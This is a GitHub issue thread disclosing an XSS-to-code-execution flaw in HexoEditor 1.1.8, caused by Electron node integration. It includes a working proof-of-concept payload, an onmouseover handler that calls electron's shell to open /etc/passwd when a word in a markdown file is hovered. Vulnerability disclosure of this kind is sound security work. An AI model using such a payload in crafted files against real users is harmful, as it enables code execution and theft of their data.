Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS to code execution vulnerability #3

Open
silviavali opened this issue Jan 3, 2018 · 3 comments
Open

XSS to code execution vulnerability #3

silviavali opened this issue Jan 3, 2018 · 3 comments
Labels
🆘Help wanted 寻求帮助 ⚠️Bug 缺陷

Comments

@silviavali
Copy link

As this project has inherited the Moeditor based on the information received here: Moeditor/Moeditor#156

I would like to report XSS to code execution vulnerability in HexoEditor version 1.1.8 . Please do contact me at silviavali14@gmail.com for the poc.

@zhuzhuyule
Copy link
Owner

hello, what's problem ?

@silviavali
Copy link
Author

Update: Report sent attached to the e-mail

@zhuzhuyule zhuzhuyule added ⚠️Bug 缺陷 🆘Help wanted 寻求帮助 labels Jan 3, 2018
@silviavali
Copy link
Author

"XSS to code execution vulnerability due to enabled node integration"

Vulnerability: XSS to code execution
Version: 1.1.8
Initially reported: January 3rd, 2018
Tested on 16.04.1-Ubuntu

PoC: paste the following payload as the content of the markdown file:

<s <onmouseover="alert(1)"> <s onmouseover="var {shell} = require('electron');
shell.openExternal('file:/etc/passwd'); alert('XSS to code execution')">Hallo</s>

image

then, if you now hover over the word Hallo, the '/etc/passwd' file and an alert with words “XSS to
code execution” will pop up:
image

Attack vector: If the victim is forced or tricked into pasting such code or open a crafted file in the markdown editor, it is possible for the attacker to steal user’s data from the computer or perform any actions on the machine on which the application running on.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
🆘Help wanted 寻求帮助 ⚠️Bug 缺陷
Projects
None yet
Development

No branches or pull requests

2 participants